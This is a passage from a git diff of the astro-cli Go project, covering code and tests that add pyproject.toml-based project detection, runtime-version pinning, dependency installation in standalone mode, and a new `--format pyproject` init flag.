"pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(validPyProject), 0o644)) + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte("FROM astro-runtime:12.0.0"), 0o644)) + + s.Equal(ProjectFormatPy, DetectProjectFormat(tmpDir)) +} + +func (s *Suite) TestDetectProjectFormat_Unknown() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Equal(ProjectFormatUnknown, DetectProjectFormat(tmpDir)) +} + +func (s *Suite) TestDetectProjectFormat_PyProjectWithoutAstro() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + // pyproject.toml exists but without [tool.astro] — should NOT be detected as pyproject format + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(noAstroSection), 0o644)) + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte("FROM astro-runtime:12.0.0"), 0o644)) + + s.Equal(ProjectFormatDocker, DetectProjectFormat(tmpDir)) +} + +// --- PinRuntimeVersion tests --- + +func (s *Suite) TestPinRuntimeVersion_AddsWhenMissing() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + initial := "[project]\nname = \"test\"\n\n[tool.astro]\nairflow-version = \"3.0.1\"\n" + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(initial), 0o644)) + + err = PinRuntimeVersion(tmpDir, "3.0-2") + s.NoError(err) + + // Verify via re-parsing (library may use single or double quotes) + proj, readErr := ReadProject(tmpDir) + s.NoError(readErr) + s.Equal("3.0-2", proj.RuntimeVersion) + s.Equal("3.0.1", proj.AirflowVersion) +} + +func (s *Suite) TestPinRuntimeVersion_UpdatesExisting() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + initial := "[project]\nname = \"test\"\n\n[tool.astro]\nairflow-version = \"3.0.1\"\nruntime-version = \"3.0-1\"\n" + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(initial), 0o644)) + + err = PinRuntimeVersion(tmpDir, "3.0-2") + s.NoError(err) + + proj, readErr := ReadProject(tmpDir) + s.NoError(readErr) + s.Equal("3.0-2", proj.RuntimeVersion) +} + +func (s *Suite) TestPinRuntimeVersion_PreservesOtherSections() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + initial := `[project] +name = "test" +requires-python = ">=3.12" +dependencies = ["pandas>=2.0"] + +[tool.astro] +airflow-version = "3.0.1" + +[tool.ruff] +line-length = 120 + +[build-system] +requires = ["hatchling"] +build-backend = "hatchling.build" +` + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(initial), 0o644)) + + err = PinRuntimeVersion(tmpDir, "3.0-2") + s.NoError(err) + + content, err := os.ReadFile(filepath.Join(tmpDir, PyProjectFile)) + s.NoError(err) + + // runtime-version was added + s.Contains(string(content), `runtime-version = "3.0-2"`) + // Other sections preserved + s.Contains(string(content), "[tool.ruff]") + s.Contains(string(content), "line-length = 120") + s.Contains(string(content), "[build-system]") + s.Contains(string(content), "hatchling") + s.Contains(string(content), `dependencies = ["pandas>=2.0"]`) +} diff --git a/airflow/standalone.go b/airflow/standalone.go index 4c014d3b2..5059be063 100644 --- a/airflow/standalone.go +++ b/airflow/standalone.go @@ -109,6 +109,19 @@ var resolvePythonVersion = func(baseTag, tagPython string) string { return defaultPythonVersion } +// extractPythonVersion extracts a bare version like "3.12" from a PEP 440 +// requires-python specifier such as ">=3.12" or "==3.12". Returns "" if the +// input is empty or doesn't contain a recognizable version. +var pythonVersionRe = regexp.MustCompile(`(\d+\.\d+)`) + +func extractPythonVersion(requiresPython string) string { + if requiresPython == "" { + return "" + } + m := pythonVersionRe.FindString(requiresPython) + return m +} + // Standalone implements ContainerHandler using `airflow standalone` instead of Docker Compose. type Standalone struct { airflowHome string @@ -170,39 +183,82 @@ func (s *Standalone) Start(opts *types.StartOptions) error { fmt.Println(ansi.Bold("Note:") + " Standalone mode is experimental. Report issues at https://github.com/astronomer/astro-cli/issues") fmt.Println() - // 1. Parse Dockerfile to get runtime image + tag - cmds, err := standaloneParseFile(filepath.Join(s.airflowHome, "Dockerfile")) - if err != nil { - return fmt.Errorf("error parsing Dockerfile: %w", err) - } - _, tag := standaloneGetImageTag(cmds) - if tag == "" { - return errors.New("could not determine runtime version from Dockerfile") - } + // 1. Resolve runtime version and Python version from project definition. + var baseTag, pythonVersion string + var userDeps []string // populated only for pyproject format + var isPyProjectFmt bool // tracks format to avoid re-parsing pyproject.toml later + + proj, found, tryErr := TryReadProject(s.airflowHome) + if found && tryErr != nil { + return fmt.Errorf("error reading pyproject.toml: %w", tryErr) + } + if proj != nil { + isPyProjectFmt = true + baseTag = proj.RuntimeVersion + if baseTag == "" { + // Resolve from airflow-version and pin it to pyproject.toml + if proj.AirflowVersion == "" { + return errors.New("[tool.astro] requires airflow-version in pyproject.toml") + } + baseTag = airflowversions.GetLatestRuntimeForAirflow(proj.AirflowVersion) + if baseTag == "" { + return fmt.Errorf("could not resolve a runtime version for airflow-version %q", proj.AirflowVersion) + } + fmt.Printf("Resolved runtime-version %q for airflow-version %q (pinning to pyproject.toml)\n", baseTag, proj.AirflowVersion) + fmt.Println("Note: one airflow-version may have multiple runtime versions. Pin runtime-version in pyproject.toml to avoid accidental upgrades on deploy.") + if pinErr := PinRuntimeVersion(s.airflowHome, baseTag); pinErr != nil { + fmt.Printf("Warning: could not pin runtime-version to pyproject.toml: %s\n", pinErr) + } + } + // Validate airflow-version matches runtime-version + if proj.AirflowVersion != "" { + actual := airflowversions.GetAirflowVersionForRuntime(baseTag) + if actual != "" && actual != proj.AirflowVersion { + fmt.Printf("Warning: airflow-version %q does not match runtime-version %q (which bundles Airflow %s). Consider updating airflow-version or runtime-version.\n", + proj.AirflowVersion, baseTag, actual) + } + } - baseTag, tagPython := parseRuntimeTagPython(tag) + pythonVersion = extractPythonVersion(proj.RequiresPython) + if pythonVersion == "" { + pythonVersion = resolvePythonVersion(baseTag, "") + } + userDeps = proj.Dependencies + } else { + // Legacy path: parse Dockerfile + cmds, parseErr := standaloneParseFile(filepath.Join(s.airflowHome, "Dockerfile")) + if parseErr != nil { + return fmt.Errorf("error parsing Dockerfile: %w", parseErr) + } + _, tag := standaloneGetImageTag(cmds) + if tag == "" { + return errors.New("could not determine runtime version from Dockerfile") + } - // 2. Validate Airflow version (AF3 only). - // If the tag isn't a pinned runtime version (X.Y-Z), try to resolve it - // as a floating tag (e.g., "3.1" → "3.1-12") via the runtime versions JSON. - if !fullRuntimeTagRe.MatchString(baseTag) { - resolved, resolveErr := resolveFloatingTag(baseTag) - if resolveErr == nil { - baseTag = resolved - } else if airflowversions.AirflowMajorVersionForRuntimeVersion(baseTag) == "" { - // Not a recognized format and not resolvable - return fmt.Errorf("could not determine runtime version from Dockerfile image tag '%s'.\nStandalone mode requires a pinned Astronomer Runtime image (e.g., astro-runtime:3.1-12)", tag) + var tagPython string + baseTag, tagPython = parseRuntimeTagPython(tag) + + // If the tag isn't a pinned runtime version (X.Y-Z), try to resolve it + // as a floating tag (e.g., "3.1" → "3.1-12") via the runtime versions JSON. + if !fullRuntimeTagRe.MatchString(baseTag) { + resolved, resolveErr := resolveFloatingTag(baseTag) + if resolveErr == nil { + baseTag = resolved + } else if airflowversions.AirflowMajorVersionForRuntimeVersion(baseTag) == "" { + return fmt.Errorf("could not determine runtime version from Dockerfile image tag '%s'.\nStandalone mode requires a pinned Astronomer Runtime image (e.g., astro-runtime:3.1-12)", tag) + } } - // If it's an old-format tag (e.g., "12.0.0"), fall through to the AF3 check + + pythonVersion = resolvePythonVersion(baseTag, tagPython) } + + // 2. Validate Airflow version (AF3 only). if airflowversions.AirflowMajorVersionForRuntimeVersion(baseTag) != "3" { return errUnsupportedAirflowVersion } - pythonVersion := resolvePythonVersion(baseTag, tagPython) - // 3. Check uv is on PATH - _, err = lookPath("uv") + _, err := lookPath("uv") if err != nil { return errUVNotFound } @@ -292,23 +348,46 @@ func (s *Standalone) Start(opts *types.StartOptions) error { return fmt.Errorf("error installing dependencies: %w", err) } - // Step 2: Install user requirements with only airflow/sdk version locks - requirementsPath := filepath.Join(s.airflowHome, "requirements.txt") - if exists, _ := fileutil.Exists(requirementsPath, nil); exists { - userInstallArgs := []string{ - "pip", "install", - "--python", venvPython, - "-r", requirementsPath, - fmt.Sprintf("apache-airflow==%s", airflowVersion), - } - if taskSDKVersion != "" { - userInstallArgs = append(userInstallArgs, fmt.Sprintf("apache-airflow-task-sdk==%s", taskSDKVersion)) + // Step 2: Install user dependencies with only airflow/sdk version locks. + // If project uses pyproject.toml, install from [project.dependencies]. + // Otherwise, install from requirements.txt (legacy path). + if isPyProjectFmt { + if len(userDeps) > 0 { + userInstallArgs := []string{ + "pip", "install", + "--python", venvPython, + fmt.Sprintf("apache-airflow==%s", airflowVersion), + } + if taskSDKVersion != "" { + userInstallArgs = append(userInstallArgs, fmt.Sprintf("apache-airflow-task-sdk==%s", taskSDKVersion)) + } + // Use -- to prevent dependency strings from being interpreted as flags + userInstallArgs = append(userInstallArgs, "--index-url", standaloneIndexURL, "--") + userInstallArgs = append(userInstallArgs, userDeps...) + err = runCommand(s.airflowHome, "uv", userInstallArgs...) + if err != nil { + sp.Stop() + return fmt.Errorf("error installing user dependencies: %w", err) + } } - userInstallArgs = append(userInstallArgs, "--index-url", standaloneIndexURL) - err = runCommand(s.airflowHome, "uv", userInstallArgs...) - if err != nil { - sp.Stop() - return fmt.Errorf("error installing user requirements: %w", err) + } else { + requirementsPath := filepath.Join(s.airflowHome, "requirements.txt") + if exists, _ := fileutil.Exists(requirementsPath, nil); exists { + userInstallArgs := []string{ + "pip", "install", + "--python", venvPython, + "-r", requirementsPath, + fmt.Sprintf("apache-airflow==%s", airflowVersion), + } + if taskSDKVersion != "" { + userInstallArgs = append(userInstallArgs, fmt.Sprintf("apache-airflow-task-sdk==%s", taskSDKVersion)) + } + userInstallArgs = append(userInstallArgs, "--index-url", standaloneIndexURL) + err = runCommand(s.airflowHome, "uv", userInstallArgs...) + if err != nil { + sp.Stop() + return fmt.Errorf("error installing user requirements: %w", err) + } } } diff --git a/airflow/standalone_test.go b/airflow/standalone_test.go index afe5fec52..4d03735a0 100644 --- a/airflow/standalone_test.go +++ b/airflow/standalone_test.go @@ -846,6 +846,125 @@ func (s *Suite) TestStandaloneStart_HappyPath() { s.NoError(err) } +func (s *Suite) TestStandaloneStart_PyProject() { + tmpDir, err := os.MkdirTemp("", "standalone-pyproject-test") + s.NoError(err) + defer os.RemoveAll(tmpDir) + + // Write pyproject.toml instead of Dockerfile + pyprojectContent := `[project] +name = "test-pyproject" +requires-python = ">=3.12" +dependencies = ["pandas>=2.0"] + +[tool.astro] +airflow-version = "3.0.1" +runtime-version = "3.1-12" +mode = "standalone" +` + err = os.WriteFile(filepath.Join(tmpDir, "pyproject.toml"), []byte(pyprojectContent), 0o644) + s.NoError(err) + + // Pre-create cached constraints + freeze + constraintsDir := filepath.Join(tmpDir, ".astro", "standalone") + err = os.MkdirAll(constraintsDir, 0o755) + s.NoError(err) + err = os.WriteFile(filepath.Join(constraintsDir, "constraints-3.1-12-python-3.12.txt"), []byte("apache-airflow==3.0.1\napache-airflow-task-sdk==1.0.0\n"), 0o644) + s.NoError(err) + err = os.WriteFile(filepath.Join(constraintsDir, "freeze-3.1-12-python-3.12.txt"), []byte("apache-airflow==3.0.1\n"), 0o644) + s.NoError(err) + + // Create a fake airflow binary that exits immediately + venvBin := filepath.Join(tmpDir, ".venv", "bin") + err = os.MkdirAll(venvBin, 0o755) + s.NoError(err) + airflowScript := filepath.Join(venvBin, "airflow") + err = os.WriteFile(airflowScript, []byte("#!/bin/sh\necho 'standalone started'\nexit 0\n"), 0o755) + s.NoError(err) + + // Mock function variables + origLookPath := lookPath + origRunCommand := runCommand + origCheckHealth := checkWebserverHealth + origCheckPort := checkPortAvailable + defer func() { + lookPath = origLookPath + runCommand = origRunCommand + checkWebserverHealth = origCheckHealth + checkPortAvailable = origCheckPort + }() + + checkPortAvailable = func(_ string) error { return nil } + + lookPath = func(file string) (string, error) { + return "/usr/local/bin/uv", nil + } + + // Track what uv commands were executed to verify pyproject.toml path + var uvCalls []string + runCommand = func(dir, name string, args ...string) error { + uvCalls = append(uvCalls, strings.Join(append([]string{name}, args...), " ")) + return nil + } + + checkWebserverHealth = func(url string, timeout time.Duration, component string) error { + return nil + } + + handler, err := StandaloneInit(tmpDir, ".env", "Dockerfile") + s.NoError(err) + + err = handler.Start(&types.StartOptions{SettingsFile: "airflow_settings.yaml", WaitTime: 1 * time.Minute, Foreground: true}) + s.NoError(err) + + // Verify that user deps from pyproject.toml were installed (not requirements.txt) + foundUserDeps := false + for _, call := range uvCalls { + if strings.Contains(call, "pandas>=2.0") { + foundUserDeps = true + break + } + } + s.True(foundUserDeps, "Expected uv install to include pandas>=2.0 from pyproject.toml dependencies, got calls: %v", uvCalls) + + // Verify no requirements.txt was referenced + for _, call := range uvCalls { + s.NotContains(call, "requirements.txt", "Should not reference requirements.txt when pyproject.toml is used") + } +} + +func (s *Suite) TestStandaloneStart_PyProject_MissingAirflowVersion() { + tmpDir, err := os.MkdirTemp("", "standalone-pyproject-noairflow") + s.NoError(err) + defer os.RemoveAll(tmpDir) + + // pyproject.toml without airflow-version — should error about the broken pyproject.toml + pyprojectContent := `[project] +name = "test-no-airflow" + +[tool.astro] +runtime-version = "3.1-12" +` + err = os.WriteFile(filepath.Join(tmpDir, "pyproject.toml"), []byte(pyprojectContent), 0o644) + s.NoError(err) + + handler, err := StandaloneInit(tmpDir, ".env", "Dockerfile") + s.NoError(err) + + err = handler.Start(&types.StartOptions{SettingsFile: "airflow_settings.yaml", WaitTime: 1 * time.Minute}) + s.Error(err) + s.Contains(err.Error(), "airflow-version") +} + +func (s *Suite) TestExtractPythonVersion() { + s.Equal("3.12", extractPythonVersion(">=3.12")) + s.Equal("3.11", extractPythonVersion(">=3.11")) + s.Equal("3.12", extractPythonVersion("==3.12")) + s.Equal("3.12", extractPythonVersion("~=3.12")) + s.Equal("3.12", extractPythonVersion("3.12")) + s.Equal("", extractPythonVersion("")) +} + func (s *Suite) TestStandaloneStart_Background() { tmpDir, err := os.MkdirTemp("", "standalone-bg-test") s.NoError(err) diff --git a/airflow_versions/airflow_versions.go b/airflow_versions/airflow_versions.go index 07384d255..de413ef16 100644 --- a/airflow_versions/airflow_versions.go +++ b/airflow_versions/airflow_versions.go @@ -311,3 +311,42 @@ func GetDefaultPythonVersion(runtimeVersion string) string { return "" } + +// GetLatestRuntimeForAirflow fetches the runtime versions JSON and returns +// the latest stable runtime version for the given Airflow version. +// Returns an empty string if no matching version is found. +func GetLatestRuntimeForAirflow(airflowVersion string) string { + r := Request{} + resp, err := r.Do() + if err != nil { + logger.Debugf("Failed to fetch runtime versions: %v", err) + return "" + } + + tag, err := getAstroRuntimeTag(resp.RuntimeVersions, resp.RuntimeVersionsV3, airflowVersion) + if err != nil { + return "" + } + return tag +} + +// GetAirflowVersionForRuntime fetches the runtime versions JSON and returns +// the Airflow version for the given runtime version. Returns an empty string +// if the version is not found. +func GetAirflowVersionForRuntime(runtimeVersion string) string { + r := Request{} + resp, err := r.Do() + if err != nil { + logger.Debugf("Failed to fetch runtime versions for Airflow version lookup: %v", err) + return "" + } + + if rv, ok := resp.RuntimeVersionsV3[runtimeVersion]; ok { + return rv.Metadata.AirflowVersion + } + if rv, ok := resp.RuntimeVersions[runtimeVersion]; ok { + return rv.Metadata.AirflowVersion + } + + return "" +} diff --git a/cmd/airflow.go b/cmd/airflow.go index 8e632a589..f1e3f57ca 100644 --- a/cmd/airflow.go +++ b/cmd/airflow.go @@ -109,6 +109,9 @@ astro dev init --airflow-version 2.2.3 # Initialize a new template based Astro project with the latest Astro Runtime version astro dev init --from-template +# Initialize a new Astro project using pyproject.toml (Airflow 3 only) +astro dev init --format pyproject + # Initialize a new Astro project with remote execution support astro dev init --remote-execution-enabled @@ -140,6 +143,10 @@ astro dev init --remote-execution-enabled --remote-image-repository quay.io/acme dockerFlag bool noProxyFlag bool proxyPortFlag string + projectFormat string + + getAirflowVersionForRuntime = airflowversions.GetAirflowVersionForRuntime + getDefaultPythonVersion = airflowversions.GetDefaultPythonVersion ) func newDevRootCmd(platformCoreClient astroplatformcore.CoreClient, astroCoreClient astrocore.CoreClient) *cobra.Command { @@ -180,13 +187,24 @@ func newDevRootCmd(platformCoreClient astroplatformcore.CoreClient, astroCoreCli return cmd } -// resolveDevMode returns "docker" or "standalone" based on flag priority then config. +// resolveDevMode returns "docker" or "standalone" based on priority: +// 1. CLI flags (--standalone, --docker) +// 2. [tool.astro].mode from pyproject.toml +// 3. dev.mode from .astro/config.yaml func resolveDevMode() string { if standaloneFlag { - return "standalone" + return airflow.ModeStandalone } if dockerFlag { - return "docker" + return airflow.ModeDocker + } + // Check pyproject.toml mode + proj, found, tryErr := airflow.TryReadProject(config.WorkingPath) + if found && tryErr != nil { + fmt.Printf("Warning: could not read pyproject.toml for mode detection: %s\n", tryErr) + } + if proj != nil && proj.Mode != "" { + return proj.Mode } return config.CFG.DevMode.GetString() } @@ -244,6 +262,9 @@ func newAirflowInitCmd() *cobra.Command { cmd.Flags().BoolVarP(&useAstronomerCertified, "use-astronomer-certified", "", false, "If specified, initializes a project using Astronomer Certified Airflow image instead of Astro Runtime.") _ = cmd.Flags().MarkHidden("use-astronomer-certified") } + + cmd.Flags().StringVar(&projectFormat, "format", "", "Project format: 'pyproject' uses pyproject.toml (Airflow 3 only), 'dockerfile' uses the traditional Dockerfile (default)") + return cmd } @@ -672,8 +693,39 @@ func airflowInit(cmd *cobra.Command, args []string) error { //nolint:gocognit,go // Silence Usage as we have now validated command input cmd.SilenceUsage = true - // Execute method - err = airflow.Init(config.WorkingPath, imageName, imageTag, fromTemplate, clientImageTag) + // Validate --format flag + if projectFormat != "" && projectFormat != airflow.ProjectFormatPy && projectFormat != airflow.ProjectFormatDocker { + return fmt.Errorf("invalid --format value %q: must be 'pyproject' or 'dockerfile'", projectFormat) + } + if projectFormat == airflow.ProjectFormatPy && fromTemplate != "" { + return errors.New("--format pyproject cannot be used with --from-template") + } + + // Route to pyproject.toml init if requested + if projectFormat == airflow.ProjectFormatPy { + if airflowversions.AirflowMajorVersionForRuntimeVersion(imageTag) != "3" { + return errors.New("--format pyproject is only supported for Airflow 3") + } + + // Resolve the Airflow version: use the user-provided value, or look it up from the runtime tag. + afVersion := airflowVersion + if afVersion == "" { + afVersion = getAirflowVersionForRuntime(imageTag) + } + if afVersion == "" { + return fmt.Errorf("could not determine Airflow version for runtime %s", imageTag) + } + + // Resolve Python version from the runtime API or fall back to default. + pythonVersion := getDefaultPythonVersion(imageTag) + if pythonVersion == "" { + pythonVersion = airflow.DefaultPythonVersion + } + + err = airflow.InitPyProject(config.WorkingPath, projectName, afVersion, imageTag, pythonVersion) + } else { + err = airflow.Init(config.WorkingPath, imageName, imageTag, fromTemplate, clientImageTag) + } if err != nil { return err } diff --git a/cmd/airflow_test.go b/cmd/airflow_test.go index 71273e15e..a571eb653 100644 --- a/cmd/airflow_test.go +++ b/cmd/airflow_test.go @@ -343,6 +343,92 @@ func (s *AirflowSuite) Test_airflowInitWithRemoteExecution() { }) } +func (s *AirflowSuite) Test_airflowInitFormatPyProject() { + s.Run("creates pyproject.toml project", func() { + config.WorkingPath = s.tempDir + + origGetDefaultImageTag := getDefaultImageTag + getDefaultImageTag = func(httpClient *airflowversions.Client, av string, rv string, excludeAF3 bool) (string, error) { + return "3.0-7", nil + } + defer func() { getDefaultImageTag = origGetDefaultImageTag }() + + origGetAFVersion := getAirflowVersionForRuntime + getAirflowVersionForRuntime = func(runtimeVersion string) string { + return "3.0.1" + } + defer func() { getAirflowVersionForRuntime = origGetAFVersion }() + + origGetPyVersion := getDefaultPythonVersion + getDefaultPythonVersion = func(runtimeVersion string) string { + return "3.12" + } + defer func() { getDefaultPythonVersion = origGetPyVersion }() + + cmd := newAirflowInitCmd() + cmd.Flag("name").Value.Set("test-pyproject") + cmd.Flag("format").Value.Set("pyproject") + var args []string + + err := airflowInit(cmd, args) + s.NoError(err) + + // pyproject.toml should exist + b, err := os.ReadFile(filepath.Join(s.tempDir, "pyproject.toml")) + s.NoError(err) + content := string(b) + s.Contains(content, `name = "test-pyproject"`) + s.Contains(content, `airflow-version = "3.0.1"`) + s.Contains(content, `runtime-version = "3.0-7"`) + + // Dockerfile should NOT exist + _, err = os.Stat(filepath.Join(s.tempDir, "Dockerfile")) + s.True(os.IsNotExist(err)) + + // requirements.txt should exist (needed by runtime ONBUILD for Docker mode) + _, err = os.Stat(filepath.Join(s.tempDir, "requirements.txt")) + s.NoError(err) + }) + + s.Run("rejects pyproject format for Airflow 2", func() { + config.WorkingPath = s.tempDir + + origGetDefaultImageTag := getDefaultImageTag + getDefaultImageTag = func(httpClient *airflowversions.Client, av string, rv string, excludeAF3 bool) (string, error) { + return "12.0.0", nil // Airflow 2 runtime tag + } + defer func() { getDefaultImageTag = origGetDefaultImageTag }() + + cmd := newAirflowInitCmd() + cmd.Flag("name").Value.Set("test-af2") + cmd.Flag("format").Value.Set("pyproject") + var args []string + + err := airflowInit(cmd, args) + s.Error(err) + s.Contains(err.Error(), "only supported for Airflow 3") + }) + + s.Run("default format unchanged", func() { + config.WorkingPath = s.tempDir + + cmd := newAirflowInitCmd() + cmd.Flag("name").Value.Set("test-default") + var args []string + + err := airflowInit(cmd, args) + s.NoError(err) + + // Dockerfile should exist (default behavior) + _, err = os.Stat(filepath.Join(s.tempDir, "Dockerfile")) + s.NoError(err) + + // pyproject.toml should NOT exist + _, err = os.Stat(filepath.Join(s.tempDir, "pyproject.toml")) + s.True(os.IsNotExist(err)) + }) +} + func (s *AirflowSuite) cleanUpInitFiles() { s.T().Helper() if s.tempDir != "" {